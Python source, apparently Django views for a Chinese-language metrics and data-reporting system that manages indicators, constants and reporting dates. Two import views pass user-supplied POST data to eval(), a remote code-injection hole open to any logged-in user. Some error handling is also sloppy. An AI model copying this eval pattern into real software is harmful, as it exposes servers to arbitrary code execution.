cumulative\n if cumulative == '3':\n try:\n weight_target = int(weight_target)\n except:\n weight_target = None\n target_save.weight_target_id = weight_target\n else:\n target_save.weight_target_id = None\n target_save.datatype = datatype\n try:\n app_id = int(adminapp)\n my_app = all_app.get(id=app_id)\n target_save.adminapp = my_app\n except:\n pass\n\n try:\n target_save.sort = int(sort)\n except:\n pass\n try:\n target_save.warn_range = int(warn_range)\n except:\n target_save.warn_range = None\n # 计算\n if operationtype == '17':\n target_save.formula = formula\n target_save.source_content = calculate_content\n try:\n calculate_source = int(calculate_source)\n except:\n calculate_source = None\n finally:\n target_save.source_id = calculate_source\n # 电表走字/提取\n if operationtype in ['1', '16'] and savetype != 'app':\n # 提取:推送配置\n if operationtype == \"16\":\n if if_push == '1':\n target_save.push_config = str(push_config)\n target_save.if_push = if_push\n\n try:\n cycle_id = int(cycle)\n my_cycle = all_cycle.get(id=cycle_id)\n target_save.cycle = my_cycle\n except:\n target_save.cycle = None\n try:\n source_id = int(source)\n my_source = all_source.get(id=source_id)\n target_save.source = my_source\n except:\n pass\n\n target_save.source_content = source_content\n try:\n target_save.is_repeat = int(is_repeat)\n except:\n pass\n try:\n storage_id = int(storage)\n my_storage = all_storage.get(id=storage_id)\n target_save.storage = my_storage\n except:\n pass\n target_save.storagetag = storagetag\n target_save.storagefields = storagefields\n target_save.save()\n # 存入多对多app\n if savetype != 'app':\n for app_id in app_list:\n try:\n app_id = int(app_id)\n my_app = all_app.get(id=app_id)\n target_save.app.add(my_app)\n except:\n pass\n result[\"res\"] = \"保存成功。\"\n result[\"data\"] = target_save.id\n else:\n # 指标修改保存前,查看指标类型与本次类型是否相同,若不同:将该指标所有数据迁移至新的表中\n try:\n c_target = Target.objects.exclude(state=\"9\").get(id=id)\n except:\n result[\"res\"] = \"指标不存在。\"\n else:\n status, info = migrate_data_before_target_changed(c_target, operationtype)\n if status == 0:\n result[\"res\"] = info\n else:\n all_target = Target.objects.filter(code=code).exclude(id=id).exclude(\n state=\"9\")\n all_constant = Constant.objects.filter(code=code).exclude(state=\"9\")\n if (len(all_target) > 0):\n result[\"res\"] = '指标代码:' + \\\n code + '已存在。'\n else:\n if (len(all_constant) > 0):\n result[\"res\"] = '常数库内已存在:' + code + '。'\n else:\n try:\n target_save = Target.objects.get(\n id=id)\n target_save.name = name\n target_save.code = code\n target_save.operationtype = operationtype\n target_save.cycletype = cycletype\n target_save.businesstype = businesstype\n target_save.unit = unit\n target_save.unity = unity\n target_save.is_select = is_select\n if data_from:\n target_save.data_from = data_from\n\n # 业务\n try:\n works = int(works)\n except:\n pass\n else:\n target_save.work_id = works\n\n if datatype == 'numbervalue':\n try:\n target_save.magnification = float(magnification)\n except:\n pass\n try:\n target_save.digit = int(digit)\n except:\n pass\n try:\n target_save.upperlimit = float(upperlimit)\n except:\n pass\n try:\n target_save.lowerlimit = float(lowerlimit)\n except:\n pass\n target_save.cumulative = cumulative\n if cumulative == '3':\n try:\n weight_target = int(weight_target)\n except:\n weight_target = None\n target_save.weight_target_id = weight_target\n else:\n target_save.weight_target_id = None\n\n target_save.datatype = datatype\n try:\n app_id = int(adminapp)\n my_app = all_app.get(id=app_id)\n target_save.adminapp = my_app\n except:\n pass\n\n try:\n target_save.sort = int(sort)\n except:\n pass\n try:\n target_save.warn_range = int(warn_range)\n except:\n target_save.warn_range = None\n if operationtype == '17':\n target_save.formula = formula\n target_save.source_content = calculate_content\n try:\n calculate_source = int(calculate_source)\n except:\n calculate_source = None\n finally:\n target_save.source_id = calculate_source\n if operationtype in ['1', '16'] and savetype != 'app':\n if operationtype == \"16\":\n if if_push == '1':\n target_save.push_config = str(push_config)\n target_save.if_push = if_push\n\n try:\n cycle_id = int(cycle)\n my_cycle = all_cycle.get(id=cycle_id)\n target_save.cycle = my_cycle\n except:\n target_save.cycle = None\n try:\n source_id = int(source)\n my_source = all_source.get(id=source_id)\n target_save.source = my_source\n except:\n pass\n\n target_save.source_content = source_content\n try:\n target_save.is_repeat = int(is_repeat)\n except:\n pass\n try:\n storage_id = int(storage)\n my_storage = all_storage.get(id=storage_id)\n target_save.storage = my_storage\n except:\n pass\n target_save.storagetag = storagetag\n target_save.storagefields = storagefields\n target_save.save()\n # 存入多对多app\n if savetype != 'app':\n target_save.app.clear()\n for app_id in app_list:\n try:\n app_id = int(app_id)\n my_app = all_app.get(id=app_id)\n target_save.app.add(my_app)\n except:\n pass\n result[\"res\"] = \"保存成功。\"\n result[\"data\"] = target_save.id\n except Exception as e:\n print(e)\n result[\"res\"] = \"修改失败。\"\n\n return JsonResponse(result)\n\n\ndef target_del(request):\n if request.user.is_authenticated():\n if 'id' in request.POST:\n id = request.POST.get('id', '')\n try:\n id = int(id)\n except:\n raise Http404()\n target = Target.objects.get(id=id)\n target.state = \"9\"\n target.save()\n\n return HttpResponse(1)\n else:\n return HttpResponse(0)\n\n\ndef target_app_index(request, funid):\n \"\"\"\n 指标管理\n \"\"\"\n if request.user.is_authenticated():\n operation_type_list = []\n cycle_type_list = []\n business_type_list = []\n unit_list = []\n source_list = []\n cycle_list = []\n storage_list = []\n app_list = []\n adminapp = \"\"\n try:\n cur_fun = Fun.objects.filter(id=int(funid)).exclude(state='9')\n adminapp = cur_fun[0].app\n except:\n return HttpResponseRedirect(\"/index\")\n\n applist = App.objects.all().exclude(state='9')\n for i in applist:\n app_list.append({\n \"app_name\": i.name,\n \"app_id\": i.id,\n })\n\n c_dict_index_1 = DictIndex.objects.filter(\n id=1).exclude(state='9')\n if c_dict_index_1.exists():\n c_dict_index_1 = c_dict_index_1[0]\n dict_list1 = c_dict_index_1.dictlist_set.exclude(state=\"9\")\n for i in dict_list1:\n operation_type_list.append({\n \"operation_type_name\": i.name,\n \"operation_type_id\": i.id,\n })\n\n c_dict_index_2 = DictIndex.objects.filter(\n id=12).exclude(state='9')\n if c_dict_index_2.exists():\n c_dict_index_2 = c_dict_index_2[0]\n dict_list2 = c_dict_index_2.dictlist_set.exclude(state=\"9\")\n for i in dict_list2:\n cycle_type_list.append({\n \"cycle_type_name\": i.name,\n \"cycle_type_id\": i.id,\n })\n\n c_dict_index_3 = DictIndex.objects.filter(\n id=5).exclude(state='9')\n if c_dict_index_3.exists():\n c_dict_index_3 = c_dict_index_3[0]\n dict_list3 = c_dict_index_3.dictlist_set.exclude(state=\"9\")\n for i in dict_list3:\n business_type_list.append({\n \"business_type_name\": i.name,\n \"business_type_id\": i.id,\n })\n\n c_dict_index_4 = DictIndex.objects.filter(\n id=6).exclude(state='9')\n if c_dict_index_4.exists():\n c_dict_index_4 = c_dict_index_4[0]\n dict_list4 = c_dict_index_4.dictlist_set.exclude(state=\"9\")\n for i in dict_list4:\n unit_list.append({\n \"unit_name\": i.name,\n \"unit_id\": i.id,\n })\n\n sourcelist = Source.objects.all().exclude(state='9').exclude(pnode_id=None).filter(type='')\n for i in sourcelist:\n source_list.append({\n \"source_name\": i.name,\n \"source_id\": i.id,\n })\n\n cyclelist = Cycle.objects.all().exclude(state='9')\n for i in cyclelist:\n cycle_list.append({\n \"cycle_name\": i.name,\n \"cycle_id\": i.id,\n })\n\n all_dict_list = DictList.objects.exclude(state='9').values('id', 'name')\n\n storagelist = Storage.objects.all().exclude(state='9')\n for i in storagelist:\n storage_type = i.storagetype\n storage_type_display = \"\"\n for dict in all_dict_list:\n if storage_type == str(dict['id']):\n storage_type_display = dict['name']\n break\n storage_list.append({\n \"storage_name\": i.name,\n \"storage_id\": i.id,\n \"storage_type\": storage_type_display,\n \"tablename\": i.tablename,\n })\n\n # 所有业务\n works_list = []\n if adminapp:\n works_list = adminapp.work_set.exclude(state='9').values('id', 'name', 'core')\n\n return render(request, 'target_app.html',\n {'username': request.user.userinfo.fullname,\n \"app_list\": app_list,\n \"operation_type_list\": operation_type_list,\n \"cycle_type_list\": cycle_type_list,\n \"business_type_list\": business_type_list,\n \"unit_list\": unit_list,\n \"source_list\": source_list,\n \"cycle_list\": cycle_list,\n \"storage_list\": storage_list,\n \"adminapp\": adminapp.id if adminapp else '',\n \"works_list\": works_list,\n \"pagefuns\": getpagefuns(funid,request)})\n else:\n return HttpResponseRedirect(\"/login\")\n\n\ndef target_importadminapp(request):\n if request.user.is_authenticated():\n adminapp = request.POST.get(\"adminapp\", \"\")\n selectedtarget = request.POST.get('selectedtarget', '[]')\n\n result = {}\n try:\n app_id = int(adminapp)\n except:\n result[\"res\"] = '数据异常,请重新打开页面。'\n else:\n my_app = App.objects.exclude(state=\"9\").filter(id=app_id)\n if len(my_app) > 0:\n curapp = my_app[0]\n\n Target.objects.exclude(state=\"9\").filter(\n id__in=[int(target) for target in eval(selectedtarget)]).update(**{\n 'adminapp': curapp\n })\n\n result[\"res\"] = '导入完成。'\n else:\n result[\"res\"] = '当前应用不存在。'\n\n return JsonResponse(result)\n\n\ndef target_app_search_index(request, funid):\n \"\"\"\n 指标管理\n \"\"\"\n if request.user.is_authenticated():\n operation_type_list = []\n cycle_type_list = []\n business_type_list = []\n unit_list = []\n source_list = []\n cycle_list = []\n storage_list = []\n adminapp = \"\"\n try:\n cur_fun = Fun.objects.filter(id=int(funid)).exclude(state='9')\n adminapp = cur_fun[0].app_id\n except:\n return HttpResponseRedirect(\"/index\")\n\n c_dict_index_1 = DictIndex.objects.filter(\n id=1).exclude(state='9')\n if c_dict_index_1.exists():\n c_dict_index_1 = c_dict_index_1[0]\n dict_list1 = c_dict_index_1.dictlist_set.exclude(state=\"9\")\n for i in dict_list1:\n operation_type_list.append({\n \"operation_type_name\": i.name,\n \"operation_type_id\": i.id,\n })\n\n c_dict_index_2 = DictIndex.objects.filter(\n id=12).exclude(state='9')\n if c_dict_index_2.exists():\n c_dict_index_2 = c_dict_index_2[0]\n dict_list2 = c_dict_index_2.dictlist_set.exclude(state=\"9\")\n for i in dict_list2:\n cycle_type_list.append({\n \"cycle_type_name\": i.name,\n \"cycle_type_id\": i.id,\n })\n\n c_dict_index_3 = DictIndex.objects.filter(\n id=5).exclude(state='9')\n if c_dict_index_3.exists():\n c_dict_index_3 = c_dict_index_3[0]\n dict_list3 = c_dict_index_3.dictlist_set.exclude(state=\"9\")\n for i in dict_list3:\n business_type_list.append({\n \"business_type_name\": i.name,\n \"business_type_id\": i.id,\n })\n\n c_dict_index_4 = DictIndex.objects.filter(\n id=6).exclude(state='9')\n if c_dict_index_4.exists():\n c_dict_index_4 = c_dict_index_4[0]\n dict_list4 = c_dict_index_4.dictlist_set.exclude(state=\"9\")\n for i in dict_list4:\n unit_list.append({\n \"unit_name\": i.name,\n \"unit_id\": i.id,\n })\n\n sourcelist = Source.objects.all().exclude(state='9').filter(type='')\n for i in sourcelist:\n source_list.append({\n \"source_name\": i.name,\n \"source_id\": i.id,\n })\n\n cyclelist = Cycle.objects.all().exclude(state='9')\n for i in cyclelist:\n cycle_list.append({\n \"cycle_name\": i.name,\n \"cycle_id\": i.id,\n })\n\n storagelist = Storage.objects.all().exclude(state='9')\n for i in storagelist:\n storage_list.append({\n \"storage_name\": i.name,\n \"storage_id\": i.id,\n })\n\n # 所有业务 所有应用\n all_works = Work.objects.exclude(state='9').values('app_id', 'id', 'name')\n all_apps = App.objects.exclude(state='9').values('id', 'name')\n search_app = []\n for aa in all_apps:\n works = []\n\n for aw in all_works:\n if aw['app_id'] == aa['id']:\n works.append({\n 'id': aw['id'],\n 'name': aw['name']\n })\n search_app.append({\n 'id': aa['id'],\n 'name': aa['name'],\n \"works\": works\n })\n\n return render(request, 'target_app_search.html',\n {'username': request.user.userinfo.fullname,\n \"operation_type_list\": operation_type_list,\n \"cycle_type_list\": cycle_type_list,\n \"business_type_list\": business_type_list,\n \"unit_list\": unit_list,\n \"source_list\": source_list,\n \"cycle_list\": cycle_list,\n \"storage_list\": storage_list,\n \"adminapp\": adminapp,\n \"search_app\": search_app,\n \"pagefuns\": getpagefuns(funid,request)})\n else:\n return HttpResponseRedirect(\"/login\")\n\n\ndef target_importapp(request):\n if request.user.is_authenticated():\n adminapp = request.POST.get(\"adminapp\", \"\")\n selectedtarget = request.POST.get('selectedtarget', '[]')\n\n result = {}\n try:\n app_id = int(adminapp)\n except:\n result[\"res\"] = '数据异常,请重新打开页面。'\n my_app = App.objects.exclude(state=\"9\").filter(id=app_id)\n if len(my_app) > 0:\n curapp = my_app[0]\n for target in eval(selectedtarget):\n try:\n my_target = Target.objects.exclude(state=\"9\").get(id=int(target))\n my_target.app.add(curapp)\n except Exception as e:\n print(e)\n result[\"res\"] = '导入完成。'\n else:\n result[\"res\"] = '当前应用不存在。'\n\n return JsonResponse(result)\n\n\ndef target_app_del(request):\n if request.user.is_authenticated():\n if 'id' in request.POST:\n adminapp = request.POST.get(\"adminapp\", \"\")\n id = request.POST.get('id', '')\n try:\n id = int(id)\n app_id = int(adminapp)\n except:\n raise Http404()\n my_app = App.objects.exclude(state=\"9\").get(id=app_id)\n target = Target.objects.get(id=id)\n target.app.remove(my_app)\n target.save()\n\n return HttpResponse(1)\n else:\n return HttpResponse(0)\n\n\ndef constant_index(request, funid):\n if request.user.is_authenticated():\n app_list = []\n applist = App.objects.all().exclude(state='9')\n for i in applist:\n app_list.append({\n \"app_name\": i.name,\n \"app_id\": i.id,\n })\n\n return render(request, 'constant.html',\n {'username': request.user.userinfo.fullname,\n \"app_list\": app_list,\n \"pagefuns\": getpagefuns(funid,request)})\n else:\n return HttpResponseRedirect(\"/login\")\n\n\ndef constant_data(request):\n if request.user.is_authenticated():\n search_adminapp = request.GET.get('search_adminapp', '')\n result = []\n all_constant = Constant.objects.exclude(state=\"9\").order_by(\"sort\")\n if search_adminapp != \"\":\n if search_adminapp == 'null':\n all_constant = all_constant.filter(adminapp=None)\n else:\n curadminapp = App.objects.get(id=int(search_adminapp))\n all_constant = all_constant.filter(adminapp=curadminapp)\n\n for constant in all_constant:\n adminapp_name = \"\"\n try:\n adminapp_name = constant.adminapp.name\n except:\n pass\n value = \"{:f}\".format(decimal.Decimal(str(constant.value) if str(constant.value) else \"0\").normalize())\n result.append({\n \"adminapp_name\": adminapp_name,\n \"id\": constant.id,\n \"name\": constant.name,\n \"unity\": constant.unity,\n \"code\": constant.code,\n \"value\": value,\n \"adminapp\": constant.adminapp_id,\n \"sort\": constant.sort,\n \"state\": constant.state,\n })\n return JsonResponse({\"data\": result})\n\n\ndef constant_save(request):\n if request.user.is_authenticated():\n id = request.POST.get(\"id\", \"\")\n name = request.POST.get(\"name\", \"\")\n code = request.POST.get(\"code\", \"\")\n value = request.POST.get(\"value\", \"\")\n adminapp = request.POST.get(\"adminapp\", \"\")\n sort = request.POST.get(\"sort\", \"\")\n unity = request.POST.get(\"unity\", \"\")\n\n all_app = App.objects.exclude(state=\"9\")\n\n try:\n id = int(id)\n except:\n raise Http404()\n\n result = {}\n\n if name.strip() == '':\n result[\"res\"] = '常数名称不能为空。'\n else:\n if code.strip() == '':\n result[\"res\"] = '常数代码不能为空。'\n else:\n if value.strip() == '':\n result[\"res\"] = '常数值不能为空。'\n else:\n if id == 0:\n all_constant = Constant.objects.filter(code=code).exclude(state=\"9\")\n all_target = Target.objects.filter(code=code).exclude(state=\"9\")\n if (len(all_constant) > 0):\n result[\"res\"] = '常数代码:' + code + '已存在。'\n else:\n if (len(all_target) > 0):\n result[\"res\"] = '指标库内已存在:' + code + '。'\n else:\n constant_save = Constant()\n constant_save.name = name\n constant_save.code = code\n constant_save.value = float(value)\n constant_save.unity = unity\n\n try:\n app_id = int(adminapp)\n my_app = all_app.get(id=app_id)\n constant_save.adminapp = my_app\n except:\n pass\n try:\n constant_save.sort = int(sort)\n except:\n pass\n constant_save.save()\n result[\"res\"] = \"保存成功。\"\n result[\"data\"] = constant_save.id\n\n else:\n all_constant = Constant.objects.filter(code=code).exclude(id=id).exclude(state=\"9\")\n all_target = Target.objects.filter(code=code).exclude(state=\"9\")\n if (len(all_constant) > 0):\n result[\"res\"] = '常数代码:' + code + '已存在。'\n else:\n if (len(all_target) > 0):\n result[\"res\"] = '指标库内已存在:' + code + '。'\n else:\n try:\n constant_save = Constant.objects.get(id=id)\n constant_save.name = name\n constant_save.code = code\n constant_save.value = float(value)\n constant_save.unity = unity\n\n try:\n app_id = int(adminapp)\n my_app = all_app.get(id=app_id)\n constant_save.adminapp = my_app\n except:\n pass\n try:\n constant_save.sort = int(sort)\n except:\n pass\n\n constant_save.save()\n result[\"res\"] = \"保存成功。\"\n result[\"data\"] = constant_save.id\n except Exception as e:\n result[\"res\"] = \"修改失败。\"\n\n return JsonResponse(result)\n\n\ndef constant_del(request):\n if request.user.is_authenticated():\n if 'id' in request.POST:\n id = request.POST.get('id', '')\n try:\n id = int(id)\n except:\n raise Http404()\n constant = Constant.objects.get(id=id)\n constant.state = \"9\"\n constant.save()\n return HttpResponse(1)\n else:\n return HttpResponse(0)\n\n\ndef constant_app_index(request, funid):\n if request.user.is_authenticated():\n try:\n cur_fun = Fun.objects.filter(id=int(funid)).exclude(state='9')\n adminapp = cur_fun[0].app\n except:\n return HttpResponseRedirect(\"/index\")\n\n return render(request, 'constant_app.html',\n {'username': request.user.userinfo.fullname,\n \"adminapp\": adminapp.id if adminapp else '',\n \"pagefuns\": getpagefuns(funid,request)})\n else:\n return HttpResponseRedirect(\"/login\")\n\n\ndef getreporting_date(date, cycletype):\n if cycletype == \"10\":\n date = datetime.datetime.strptime(date, \"%Y-%m-%d\")\n if cycletype == \"11\":\n date = datetime.datetime.strptime(date, \"%Y-%m\")\n year = date.year\n month = date.month\n a, b = calendar.monthrange(year, month) # a,b——weekday的第一天是星期几(0-6对应星期一到星期天)和这个月的所有天数\n date = datetime.datetime(year=year, month=month, day=b) # 构造本月月末datetime\n if cycletype == \"12\":\n date = datetime.datetime.strptime(date, \"%Y-%m-%d\")\n if cycletype == \"13\":\n date = datetime.datetime.strptime(date, \"%Y-%m-%d\")\n\n if cycletype == \"14\":\n date = datetime.datetime.strptime(date, \"%Y\")\n date = date.replace(month=12, day=31)\n\n return date\n\n\ndef getyesterdayreport_date(date, cycletype):\n yesterday = ''\n if cycletype == \"10\":\n yesterday = datetime.datetime.strptime(date, \"%Y-%m-%d\") - datetime.timedelta(days=1)\n if cycletype == \"11\":\n date = datetime.datetime.strptime(date, \"%Y-%m\")\n year = date.year\n if date.month == 1:\n year = date.year - 1\n month = 12\n a, b = calendar.monthrange(year, month)\n yesterday = datetime.datetime(year=year, month=month, day=b)\n else:\n month = date.month - 1\n a, b = calendar.monthrange(year, month)\n yesterday = datetime.datetime(year=year, month=month, day=b)\n if cycletype == \"12\":\n date = datetime.datetime.strptime(date, \"%Y-%m-%d\")\n year = date.year\n if date.month == 3:\n month = 12\n year = year - 1\n a, b = calendar.monthrange(year, month)\n yesterday = datetime.datetime(year=year, month=month, day=b)\n else:\n month = date.month - 3\n a, b = calendar.monthrange(year, month)\n yesterday = datetime.datetime(year=year, month=month, day=b)\n if cycletype == \"13\":\n date = datetime.datetime.strptime(date, \"%Y-%m-%d\")\n year = date.year\n if date.month == 6:\n month = 12\n year = year - 1\n a, b = calendar.monthrange(year, month)\n yesterday = datetime.datetime(year=year, month=month, day=b)\n else:\n month = date.month - 6\n a, b = calendar.monthrange(year, month)\n yesterday = datetime.datetime(year=year, month=month, day=b)\n if cycletype == \"14\":\n date = datetime.datetime.strptime(date, \"%Y\")\n year = date.year\n yesterday = date.replace(year=year-1, month=12, day=31)\n return yesterday\n\n\ndef reporting_index(request, cycletype, funid):\n \"\"\"\n 数据填报\n \"\"\"\n if request.user.is_authenticated():\n app = \"\"\n try:\n cur_fun = Fun.objects.filter(id=int(funid)).exclude(state='9')\n app = cur_fun[0].app_id\n work = cur_fun[0].work\n except:\n return HttpResponseRedirect(\"/index\")\n else:\n now = datetime.datetime.now().replace(hour=0, minute=0, second=0, microsecond=0) + datetime.timedelta(\n days=-1)\n date = now.strftime(\"%Y-%m-%d\")\n if cycletype == '10':\n now = datetime.datetime.now().replace(hour=0, minute=0, second=0, microsecond=0) + datetime.timedelta(\n days=-1)\n date = now.strftime(\"%Y-%m-%d\")\n if cycletype == '11':\n now = (datetime.datetime.now().replace(day=1, hour=0, minute=0, second=0,\n microsecond=0) + datetime.timedelta(\n days=-1))\n date = now.strftime(\"%Y-%m\")\n seasondate = ''\n if cycletype == '12':\n now = datetime.datetime.now()\n month = (now.month - 1) - (now.month - 1) % 3 + 1\n now = (datetime.datetime.now().replace(month=month, day=1, hour=0, minute=0, second=0,\n microsecond=0) + datetime.timedelta(\n days=-1))\n year = now.strftime(\"%Y\")\n if now.month in (1, 2, 3):\n season = '第1季度'\n seasondate = year + '-' + season\n date = year + '-' + \"03-31\"\n if now.month in (4, 5, 6):\n season = '第2季度'\n seasondate = year + '-' + season\n date = year + '-' + \"06-30\"\n if now.month in (7, 8, 9):\n season = '第3季度'\n seasondate = year + '-' + season\n date = year + '-' + \"09-30\"\n if now.month in (10, 11, 12):\n season = '第4季度'\n seasondate = year + '-' + season\n date = year + '-' + \"12-31\"\n yeardate = ''\n if cycletype == '13':\n now = datetime.datetime.now()\n month = (now.month - 1) - (now.month - 1) % 6 + 1\n now = (datetime.datetime.now().replace(month=month, day=1, hour=0, minute=0, second=0,\n microsecond=0) + datetime.timedelta(\n days=-1))\n year = now.strftime(\"%Y\")\n if now.month in (1, 2, 3, 4, 5, 6):\n season = '上半年'\n yeardate = year + '-' + season\n date = year + '-' + \"06-30\"\n if now.month in (7, 8, 9, 10, 11, 12):\n season = '下半年'\n yeardate = year + '-' + season\n date = year + '-' + \"12-31\"\n if cycletype == '14':\n now = (datetime.datetime.now().replace(month=1, day=1, hour=0, minute=0, second=0,\n microsecond=0) + datetime.timedelta(\n days=-1))\n date = now.strftime(\"%Y\")\n\n searchtag = \"\"\n metertag = \"\"\n entrytag = \"\"\n extracttag = \"\"\n calculatetag = \"\"\n\n searchtagclass = \"\"\n metertagclass = \"\"\n entrytagclass = \"\"\n extracttagclass = \"\"\n calculatetagclass = \"\"\n\n searchtagtabclass = \"\"\n metertagtabclass = \"\"\n entrytagtabclass = \"\"\n extracttagtabclass = \"\"\n calculatetagtabclass = \"\"\n\n curapp = App.objects.filter(id=app)\n\n # 只有该功能对应的业务为核心业务,才显示数据查询标签\n if work is not None and work.core == '是':\n search_target = Target.objects.exclude(state='9').filter(cycletype=cycletype).filter(\n (Q(app__in=curapp) & ~Q(adminapp__id=app)) | (Q(adminapp__id=app) & ~Q(work__core='是'))\n ).values(\n 'adminapp__id', 'adminapp__name', 'work_id'\n )\n works = Work.objects.exclude(state='9').values(\n 'id', 'name', 'app_id'\n )\n else:\n search_target = []\n works = []\n\n meter_target = Target.objects.exclude(state='9').filter(cycletype=cycletype, adminapp_id=app, work=work,\n operationtype='1')\n entry_target = Target.objects.exclude(state='9').filter(cycletype=cycletype, adminapp_id=app, work=work,\n operationtype='15')\n extract_target = Target.objects.exclude(state='9').filter(cycletype=cycletype, adminapp_id=app, work=work,\n operationtype='16')\n calculate_target = Target.objects.exclude(state='9').filter(cycletype=cycletype, adminapp_id=app, work=work,\n operationtype='17')\n\n meter_data = getmodels(\"Meterdata\", str(now.year)).objects.exclude(state=\"9\").filter(\n target__adminapp_id=app,\n target__cycletype=cycletype,\n target__work=work,\n datadate=now)\n entry_data = getmodels(\"Entrydata\", str(now.year)).objects.exclude(state=\"9\").filter(\n target__adminapp_id=app,\n target__cycletype=cycletype,\n target__work=work,\n datadate=now)\n extract_data = getmodels(\"Extractdata\", str(now.year)).objects.exclude(state=\"9\").filter(\n target__adminapp_id=app,\n target__work=work,\n target__cycletype=cycletype, datadate=now)\n calculate_data = getmodels(\"Calculatedata\", str(now.year)).objects.exclude(state=\"9\").filter(\n target__adminapp_id=app,\n target__work=work,\n target__cycletype=cycletype, datadate=now)\n search_app = []\n check_search_app = []\n\n if not search_target:\n searchtag = \"display: none;\"\n else:\n for target in search_target:\n if target['adminapp__id']:\n works_list = []\n for w in works:\n if target['adminapp__id'] == w['app_id'] and w['id'] != work.id:\n # 过滤掉没有指标的业务项\n has_target = False\n\n for t in search_target:\n if t['work_id'] == w['id']:\n has_target = True\n break\n\n if has_target:\n works_list.append({\n 'id': w['id'],\n 'name': w['name']\n })\n\n # 数据查询的业务下拉框过滤掉没指标的项\n cursearchapp = {\n \"id\": target['adminapp__id'],\n \"name\": target['adminapp__name'],\n 'works': works_list,\n }\n check_cursearchapp = {\n \"id\": target['adminapp__id'],\n \"name\": target['adminapp__name'],\n }\n if check_cursearchapp not in check_search_app:\n search_app.append(cursearchapp)\n check_search_app.append(check_cursearchapp)\n if len(meter_target) <= 0 and len(meter_data) <= 0:\n metertag = \"display: none;\"\n if len(entry_target) <= 0 and len(entry_data) <= 0:\n entrytag = \"display: none;\"\n if len(extract_target) <= 0 and len(extract_data) <= 0:\n extracttag = \"display: none;\"\n if len(calculate_target) <= 0 and len(calculate_data) <= 0:\n calculatetag = \"display: none;\"\n\n if search_target is not None and len(search_target) > 0:\n searchtagclass = \"class=active\"\n searchtagtabclass = \"active in\"\n elif len(meter_target) > 0:\n metertagclass = \"class=active\"\n metertagtabclass = \"active in\"\n elif len(entry_target) > 0:\n entrytagclass = \"class=active\"\n entrytagtabclass = \"active in\"\n elif len(extract_target) > 0:\n extracttagclass = \"class=active\"\n extracttagtabclass = \"active in\"\n elif len(calculate_target) > 0:\n calculatetagclass = \"class=active\"\n calculatetagtabclass = \"active in\"\n\n return render(request, 'reporting.html',\n {'username': request.user.userinfo.fullname,\n \"cycletype\": cycletype,\n \"app\": app,\n \"date\": date,\n \"seasondate\": seasondate,\n \"yeardate\": yeardate,\n \"searchtag\": searchtag,\n \"metertag\": metertag,\n \"entrytag\": entrytag,\n \"extracttag\": extracttag,\n \"calculatetag\": calculatetag,\n \"searchtagclass\": searchtagclass,\n \"metertagclass\": metertagclass,\n \"entrytagclass\": entrytagclass,\n \"extracttagclass\": extracttagclass,\n \"calculatetagclass\": calculatetagclass,\n \"searchtagtabclass\": searchtagtabclass,\n \"metertagtabclass\": metertagtabclass,\n \"entrytagtabclass\": entrytagtabclass,\n \"extracttagtabclass\": extracttagtabclass,\n \"calculatetagtabclass\": calculatetagtabclass,\n \"search_app\": search_app,\n \"pagefuns\": getpagefuns(funid,request),\n \"funid\": funid})\n else:\n return HttpResponseRedirect(\"/login\")\n\n\ndef reporting_data(request):\n if request.user.is_authenticated():\n\n result = []\n app = request.GET.get('app', '')\n cycletype = request.GET.get('cycletype', '')\n reporting_date = request.GET.get('reporting_date', '')\n operationtype = request.GET.get('operationtype', '')\n funid = request.GET.get('funid', '')\n cy = request.GET.get('cycletype', '')\n date = request.GET.get('reporting_date', '')\n try:\n app = int(app)\n reporting_date = getreporting_date(reporting_date, cycletype)\n except:\n raise Http404()\n\n try:\n yesterday_report_date = getyesterdayreport_date(date, cy)\n except:\n pass\n all_data = []\n yesterday_all_data = []\n work = None\n try:\n funid = int(funid)\n fun = Fun.objects.get(id=funid)\n work = fun.work\n except:\n pass\n else:\n if operationtype == \"1\":\n all_data = getmodels(\"Meterdata\", str(reporting_date.year)).objects.exclude(state=\"9\").filter(\n target__adminapp_id=app, target__cycletype=cycletype, datadate=reporting_date,\n target__work=work).order_by(\"target__sort\").select_related(\"target\")\n\n yesterday_all_data = getmodels(\"Meterdata\", str(yesterday_report_date.year)).objects.exclude(state=\"9\").filter(\n target__adminapp_id=app, target__cycletype=cycletype, datadate=yesterday_report_date,\n target__work=work).order_by(\"target__sort\").select_related(\"target\").values('target_id', 'curvalue')\n\n if operationtype == \"15\":\n all_data = getmodels(\"Entrydata\", str(reporting_date.year)).objects.exclude(state=\"9\").filter(\n target__adminapp_id=app, target__cycletype=cycletype, datadate=reporting_date,\n target__work=work).order_by(\"target__sort\").select_related(\"target\")\n\n yesterday_all_data = getmodels(\"Entrydata\", str(yesterday_report_date.year)).objects.exclude(state=\"9\").filter(\n target__adminapp_id=app, target__cycletype=cycletype, datadate=yesterday_report_date,\n target__work=work).order_by(\"target__sort\").select_related(\"target\").values('target_id', 'curvalue')\n if operationtype == \"16\":\n all_data = getmodels(\"Extractdata\", str(reporting_date.year)).objects.exclude(state=\"9\").filter(\n target__adminapp_id=app, target__cycletype=cycletype, datadate=reporting_date,\n target__work=work).order_by(\"target__sort\").select_related(\"target\")\n\n yesterday_all_data = getmodels(\"Extractdata\", str(yesterday_report_date.year)).objects.exclude(state=\"9\").filter(\n target__adminapp_id=app, target__cycletype=cycletype, datadate=yesterday_report_date,\n target__work=work).order_by(\"target__sort\").select_related(\"target\").values('target_id', 'curvalue')\n\n if operationtype == \"17\":\n all_data = getmodels(\"Calculatedata\", str(reporting_date.year)).objects.exclude(state=\"9\").filter(\n target__adminapp_id=app, target__cycletype=cycletype, datadate=reporting_date,\n target__work=work).order_by(\"target__sort\").select_related(\"target\")\n\n yesterday_all_data = getmodels(\"Calculatedata\", str(yesterday_report_date.year)).objects.exclude(state=\"9\").filter(\n target__adminapp_id=app, target__cycletype=cycletype, datadate=yesterday_report_date,\n target__work=work).order_by(\"target__sort\").select_related(\"target\").values('target_id', 'curvalue')\n\n all_dict_list = DictList.objects.exclude(state='9').values('id', 'name')\n\n # 电表走字数据\n all_changedata = Meterchangedata.objects.exclude(state=\"9\").filter(datadate=reporting_date).values()\n for data in all_data:\n businesstypename = data.target.businesstype\n\n try:\n if businesstypename:\n for dict in all_dict_list:\n if businesstypename == str(dict['id']):\n businesstypename = dict['name']\n break\n except:\n pass\n unitname = data.target.unit\n try:\n if unitname:\n for dict in all_dict_list:\n if unitname == str(dict['id']):\n unitname = dict['name']\n break\n except:\n pass\n todayvalue = \"\"\n judgevalue = \"\"\n curvalue = \"\"\n curvaluedate = \"\"\n cumulativemonth = \"\"\n cumulativequarter = \"\"\n cumulativehalfyear = \"\"\n cumulativeyear = \"\"\n try:\n 